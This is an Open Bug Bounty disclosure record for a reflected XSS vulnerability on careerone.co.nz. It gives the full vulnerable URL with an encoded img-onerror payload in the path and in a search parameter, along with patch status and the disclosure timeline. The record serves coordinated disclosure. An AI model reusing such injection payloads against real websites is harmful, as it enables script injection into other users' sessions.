careerone.co.nz XSS vulnerability

2016-08-13T16:13:00
ID OBB:174249
Type openbugbounty
Reporter ShivprasadSambhare
Modified 2017-07-27T23:31:00

Description

Vulnerable URL:
http://www.careerone.co.nz/jobs/waikato/advertising-media-arts-entertainment/advertisin%22%3E%3Cimg%20src=x%20onerror=prompt(/OPENBUGBOUNTY/)%3E%22g-media-arts/?allisland=&ausjobs=ausjobs&form_method=popfilter&j_s_category=11454&j_s_location=54876&jobs_returned_indeed=4&jobtype=&popfilter%5Bcategory%5D%5B%5D=11454&popfilter%5Bkeywords%5D=advertisin%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28%2FOPENBUGBOUNTY%2F%29%3E%22g-media-arts&popfilter%5Blocations%5D%5B%5D=54876&popfilter%5Bsalary%5D%5Bfrom%5D=30000&popfilter%5Bsalary%5D%5Bto%5D=200000&q=advertising-media-arts&salary_from=&salary_to=
Details:

Description| Value
---|---
Patched:| Yes, on 27.07.2017
Latest check for patch:| 27.07.2017 23:31 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No
Check careerone.co.nz SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 13 August, 2016 16:13 GMT
Generic security notifications sent to website owner| 13 August, 2016 16:15 GMT
Vulnerability details disclosed by researcher| 5 November, 2016 17:14 GMT
Vulnerability patched by the website owner| 27 July, 2017 23:31 GMT